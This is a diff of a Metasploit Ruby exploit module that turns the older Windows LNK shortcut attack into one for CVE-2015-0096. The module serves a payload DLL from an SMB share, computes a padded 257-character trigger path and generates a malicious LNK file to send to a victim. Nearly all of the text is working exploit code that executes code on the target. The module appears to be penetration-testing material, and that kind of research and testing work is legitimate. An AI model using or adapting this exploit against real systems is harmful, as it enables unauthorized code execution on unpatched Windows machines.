@@ -10,28 +10,30 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Remote::SMB::Server::Share
 
+  attr_accessor :exploit_dll_name
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name'	=> 'Microsoft Windows Shell LNK Code Execution',
         'Description'	=> %q{
-          This module exploits a vulnerability in the handling of Windows
-          Shortcut files (.LNK) that contain an icon resource pointing to a
-          malicious DLL. This creates an SMB resource to provide the payload
-          inside a DLL, and generates a LNK file which must be sent to the
-          target.
+          This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling
+          of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious
+          DLL. This creates an SMB resource to provide the payload and the trigger, and generates a
+          LNK file which must be sent to the target. This module has been tested successfully on
+          Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027
+          installed.
         },
         'Author' => [
-          'hdm', # Module itself
-          'jduck', # WebDAV implementation, UNCHOST var
-          'B_H'    # Clean LNK template
+          'Michael Heerklotz', # Vulnerability discovery
+          'juan vazquez' # msf module
         ],
         'License'	=> MSF_LICENSE,
         'References' => [
-          ['CVE', '2010-2568'],
-          ['OSVDB', '66387'],
-          ['MSB', 'MS10-046'],
+          ['CVE', '2015-0096'],
+          ['MSB', 'MS15-020'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so'],
           ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here
         ],
         'DefaultOptions' => {
@@ -44,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' => [
           [ 'Automatic',	{} ]
         ],
-        'DisclosureDate' => '2010-07-16',
+        'DisclosureDate' => '2015-03-10',
         'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
@@ -69,16 +71,26 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('FILE_CONTENTS', 'FILE_NAME')
   end
 
+  def smb_host
+    "\\\\#{srvhost}\\#{share}\\"
+  end
+
   def setup
     super
 
     self.file_contents = generate_payload_dll
-    self.file_name = "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
-    print_status("File available on #{unc}...")
+    random_char = rand_text_alpha(1)
+    self.file_name = "#{random_char}.dll"
+    prefix = "#{random_char} "
+    random_length = 257 - smb_host.length - file_name.length - prefix.length
+    self.exploit_dll_name = "#{prefix}#{rand_text_alpha(random_length)}#{file_name}"
+
+    print_status("Payload available on #{unc}...")
+    print_status("Trigger available on #{smb_host}#{exploit_dll_name}...")
   end
 
   def primer
-    lnk = generate_link(unc)
+    lnk = generate_link("#{smb_host}#{exploit_dll_name}")
     file_create(lnk)
     print_status('The LNK file must be sent or shared with the target...')
   end
